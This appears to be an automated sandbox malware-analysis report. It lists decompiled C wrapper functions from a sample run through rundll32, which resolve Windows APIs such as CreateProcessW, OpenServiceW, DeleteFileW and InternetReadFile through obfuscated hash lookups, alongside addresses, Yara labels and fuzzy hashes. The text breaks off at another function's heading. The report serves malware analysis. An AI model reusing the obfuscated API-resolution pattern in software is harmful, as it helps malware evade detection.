                                              • Instruction ID: 23bba36692211ee006ec04e59b7d61ad1385150ee53baecb45fabcbbf9669d62
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 09F037B081120CFFEB08EFA4DA4289EBFBAEB40300F20819DE804AB250D3715B509B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006C976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 21%
                                              			E006C976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006B602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E006C07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                              0x006c9772
                                              0x006c9773
                                              0x006c9778
                                              0x006c977a
                                              0x006c977b
                                              0x006c977e
                                              0x006c977f
                                              0x006c9782
                                              0x006c9785
                                              0x006c9788
                                              0x006c9789
                                              0x006c978c
                                              0x006c978f
                                              0x006c9790
                                              0x006c9791
                                              0x006c9794
                                              0x006c9797
                                              0x006c979a
                                              0x006c979d
                                              0x006c97a0
                                              0x006c97a3
                                              0x006c97a6
                                              0x006c97a7
                                              0x006c97a8
                                              0x006c97ad
                                              0x006c97b7
                                              0x006c97c3
                                              0x006c97ca
                                              0x006c97d1
                                              0x006c97d8
                                              0x006c97df
                                              0x006c97e3
                                              0x006c97fc
                                              0x006c9816
                                              0x006c981d

                                              APIs
                                              • CreateProcessW.KERNEL32(006B591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,006B591A), ref: 006C9816
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: 275f55d522530858b7a7d2d057d5d9672a4bae64aaed19fc101e6a184804ccdb
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 1511D372800148FBDF599F92DC0ACDF7F3AEF89750F104048FA1452120D2728A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006BB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E006BB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E006B602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E006C07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                              0x006bb569
                                              0x006bb56a
                                              0x006bb56d
                                              0x006bb572
                                              0x006bb574
                                              0x006bb577
                                              0x006bb57a
                                              0x006bb57d
                                              0x006bb580
                                              0x006bb583
                                              0x006bb586
                                              0x006bb587
                                              0x006bb58a
                                              0x006bb58d
                                              0x006bb590
                                              0x006bb593
                                              0x006bb594
                                              0x006bb595
                                              0x006bb59a
                                              0x006bb5a4
                                              0x006bb5b8
                                              0x006bb5c0
                                              0x006bb5c4
                                              0x006bb5cb
                                              0x006bb5d2
                                              0x006bb5d9
                                              0x006bb5e6
                                              0x006bb5fd
                                              0x006bb604

                                              APIs
                                              • CreateFileW.KERNELBASE(006C0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,006C0668,?,?,?,?), ref: 006BB5FD
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 71ada6596e293d4b9141800b077fe6fe96df1624cf5829956a4203ae46cc4d88
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: BC11B272801248BBDF56DF95DD06CEE7F7AEF89314F148198FA1862120D3729A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006C981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E006C981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006B602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E006C07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                              0x006c9821
                                              0x006c9822
                                              0x006c9825
                                              0x006c9828
                                              0x006c982a
                                              0x006c982c
                                              0x006c982f
                                              0x006c9832
                                              0x006c9835
                                              0x006c9836
                                              0x006c9837
                                              0x006c983c
                                              0x006c9855
                                              0x006c9858
                                              0x006c985f
                                              0x006c9866
                                              0x006c986d
                                              0x006c9874
                                              0x006c987b
                                              0x006c988e
                                              0x006c989b
                                              0x006c98a2

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,006B87F2,0000CAAE,0000510C,AD82F196), ref: 006C989B
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: 78c417938acd11f5a03bff333ba2bd46e50a0865f435b9378e76040704082d1a
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: F0015A76801208FBDB08EFD5D846CDFBF79EF85750F10819DF918A6220E6719B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006C7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E006C7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006B602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E006C07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                              0x006c7bf7
                                              0x006c7bf8
                                              0x006c7bfa
                                              0x006c7bfd
                                              0x006c7bff
                                              0x006c7c02
                                              0x006c7c06
                                              0x006c7c07
                                              0x006c7c0f
                                              0x006c7c1d
                                              0x006c7c25
                                              0x006c7c2d
                                              0x006c7c31
                                              0x006c7c38
                                              0x006c7c3f
                                              0x006c7c46
                                              0x006c7c4a
                                              0x006c7c5e
                                              0x006c7c67
                                              0x006c7c6d

                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 006C7C67
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: 8a406c73e28e23d7a726eb0ed6bdb019146a65cbf692f1df01d92963961c2c6a
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: 98014FB190120CFFEB49DF94C94A9DE7BB5EF44314F20819CF40567240E6B15F509B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006BF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E006BF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006B602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E006C07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                              0x006bf662
                                              0x006bf663
                                              0x006bf665
                                              0x006bf668
                                              0x006bf66a
                                              0x006bf66d
                                              0x006bf670
                                              0x006bf673
                                              0x006bf677
                                              0x006bf678
                                              0x006bf67d
                                              0x006bf687
                                              0x006bf693
                                              0x006bf69a
                                              0x006bf6a1
                                              0x006bf6a5
                                              0x006bf6a9
                                              0x006bf6b0
                                              0x006bf6c9
                                              0x006bf6d8
                                              0x006bf6de

                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 006BF6D8
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: 7ae64814fe59d1474c649b8b92ba80ac10fca8109dbcf18b754bf2484d2b9249
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: A601E5B6901208BBEF05AF94DD068DF7F75EB05324F148188F90462250D6B25E61DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006BB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E006BB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E006B602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E006C07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                              0x006bb6f3
                                              0x006bb6f8
                                              0x006bb702
                                              0x006bb70b
                                              0x006bb712
                                              0x006bb719
                                              0x006bb720
                                              0x006bb727
                                              0x006bb72e
                                              0x006bb747
                                              0x006bb759
                                              0x006bb75e

                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 006BB759
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: b3345802ca5b0594fddbbe6452ab7c6b61dcf8fad2b4ccc4a0fd8250e6aeb66f
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: F3014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA0566190D3B15E209B61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006CAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E006CAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006B602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E006C07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                              0x006caa3f
                                              0x006caa40
                                              0x006caa41
                                              0x006caa44
                                              0x006caa47
                                              0x006caa4b
                                              0x006caa4c
                                              0x006caa51
                                              0x006caa5b
                                              0x006caa64
                                              0x006caa68
                                              0x006caa6f
                                              0x006caa76
                                              0x006caa8d
                                              0x006caa90
                                              0x006caa9d
                                              0x006caaa8
                                              0x006caaad

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 006CAAA8
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 46e5df3168a12f6c6a64dade59249ba222e6b3969a6c4e1c099599137ed73dbb
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 7EF019B590020CFFDF08EF94DD4A99EBFB5EB45304F10819CF915A6250D3B69B549B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006B5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E006B5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006B602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E006C07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                              0x006b5fb5
                                              0x006b5fb6
                                              0x006b5fb7
                                              0x006b5fbb
                                              0x006b5fbc
                                              0x006b5fc1
                                              0x006b5fcb
                                              0x006b5fd7
                                              0x006b5fde
                                              0x006b5fe5
                                              0x006b5ffc
                                              0x006b5fff
                                              0x006b6006
                                              0x006b600d
                                              0x006b601a
                                              0x006b6025
                                              0x006b602a

                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 006B6025
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: e40e3028aabc697d840f131c60a15e6120ff3e6890bc46fe31bf0bcbb0cae803
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: 3AF04FB0C11208FFEB48DFA0E94689EBFB9EB40300F20819CE409A7260E7719F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Analysis Process: rundll32.exe PID: 2248 Parent PID: 3020 rundll32.exeCOMMON

                                              Executed Functions

                                              Function 002175AE, Relevance: 1.6, APIs: 1, Instructions: 62encryptionCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E002175AE(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				signed int _t55;
				void* _t63;
				void* _t64;

				_t64 = __edx;
				E0021602B(_t43);
				_v8 = 0x98b5;
				_v8 = _v8 >> 9;
				_t54 = 0x5f;
				_v8 = _v8 / _t54;
				_v8 = _v8 + 0xffff1c63;
				_v8 = _v8 ^ 0xffff635b;
				_v12 = 0x5016;
				_v12 = _v12 + 0xffff6b9b;
				_t55 = 0x41;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x03f03403;
				_t51 = E002207A9(0x93576eb5, 0x12e6675d, _t55, _t55, 0x110);
				_t52 =  *_t51(_a36, _a12, _t64, _a20, _a32, 0, _a8, _a24, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t63, __ecx, __ecx); // executed
				return _t52;
			}












                                              0x002175b7
                                              0x002175d8
                                              0x002175dd
                                              0x002175e7
                                              0x002175f2
                                              0x002175f7
                                              0x002175fc
                                              0x00217603
                                              0x0021760a
                                              0x00217611
                                              0x0021761b
                                              0x00217623
                                              0x0021762b
                                              0x0021763f
                                              0x0021765c
                                              0x00217662

                                              APIs
                                              • CryptDecodeObjectEx.CRYPT32(00001A16,3FEE891D,00000000,FFFF309F,FEFFE01A,00000000,?,01C46047), ref: 0021765C
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CryptDecodeObject
                                              • String ID:
                                              • API String ID: 1207547050-0
                                              • Opcode ID: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                              • Instruction ID: 466b87d670fa514f9ef40b1a7dd8c577b7083670feaf8a944ad7cc4bf7ef93ab
                                              • Opcode Fuzzy Hash: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                              • Instruction Fuzzy Hash: 6421087290060CFFDF05CF94DC46DDE7F76EB08314F148148FA1866160D7B29A61AB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0021109C, Relevance: 1.5, APIs: 1, Instructions: 46fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 71%
                                              			E0021109C(void* __ecx, WCHAR* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				void* _t38;
				signed int _t40;
				WCHAR* _t46;

				_push(_a16);
				_t46 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0021602B(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0xf19a8;
				_v20 = 0x58c643;
				_v12 = 0xbcc6;
				_v12 = _v12 | 0xbb59ffff;
				_v12 = _v12 ^ 0xbb59839d;
				_v8 = 0x5dbd;
				_v8 = _v8 << 0xd;
				_t40 = 0x3f;
				_v8 = _v8 / _t40;
				_v8 = _v8 * 0x1f;
				_v8 = _v8 ^ 0x05c44d1b;
				E002207A9(0xce5de7ff, 0x9164b7cc, _t40, _t40, 0x264);
				_t38 = FindFirstFileW(_t46, _a4); // executed
				return _t38;
			}












                                              0x002110a3
                                              0x002110a6
                                              0x002110a8
                                              0x002110ab
                                              0x002110ae
                                              0x002110b1
                                              0x002110b3
                                              0x002110b8
                                              0x002110bf
                                              0x002110c8
                                              0x002110cf
                                              0x002110d6
                                              0x002110dd
                                              0x002110e4
                                              0x002110eb
                                              0x002110f4
                                              0x002110fc
                                              0x0021110f
                                              0x00211112
                                              0x0021111f
                                              0x0021112b
                                              0x00211131

                                              APIs
                                              • FindFirstFileW.KERNEL32(?,BB59839D), ref: 0021112B
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                              • Instruction ID: 95e830f69cddbbf310b5d25a68cd91da25bba245e04752321fa086ce7e66e58a
                                              • Opcode Fuzzy Hash: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                              • Instruction Fuzzy Hash: DE1157B5D01218FBDF04EFA8D94A9DEBFB5EF44314F208098E9086B251D7B54B249F91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022023A, Relevance: 1.5, APIs: 1, Instructions: 42filenetworkCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E0022023A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				signed int _v8;
				signed int _v12;
				void* _t25;
				int _t31;
				void* _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t37 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t25);
				_v12 = 0x4c1d;
				_v12 = _v12 ^ 0x5ad90362;
				_v12 = _v12 ^ 0x5ad955af;
				_v8 = 0xc5f7;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x98520be0;
				_v8 = _v8 + 0xd998;
				_v8 = _v8 ^ 0x98094817;
				E002207A9(0xb92c1268, 0x1f801b8, __ecx, __ecx, 0x1c9);
				_t31 = InternetReadFile(_t37, _a8, _a16, _a20); // executed
				return _t31;
			}








                                              0x0022023d
                                              0x0022023e
                                              0x00220240
                                              0x00220243
                                              0x00220245
                                              0x00220248
                                              0x0022024b
                                              0x0022024e
                                              0x00220252
                                              0x00220253
                                              0x00220258
                                              0x00220262
                                              0x0022026e
                                              0x00220275
                                              0x0022028c
                                              0x0022028f
                                              0x00220296
                                              0x0022029d
                                              0x002202aa
                                              0x002202bc
                                              0x002202c2

                                              APIs
                                              • InternetReadFile.WININET(00000000,2CD2473D,0003F015,FFEAC835), ref: 002202BC
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileInternetRead
                                              • String ID:
                                              • API String ID: 778332206-0
                                              • Opcode ID: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                              • Instruction ID: a28a69fdc8fe5534aed365bbdc5b289619f6e123eff04be3156aff59b3b79206
                                              • Opcode Fuzzy Hash: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                              • Instruction Fuzzy Hash: 18012576912208FFEF05EF94D9068DEBFB9EF04314F108188F90466261D372AF61AB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00211C88, Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON
                                              Download Yara Rule
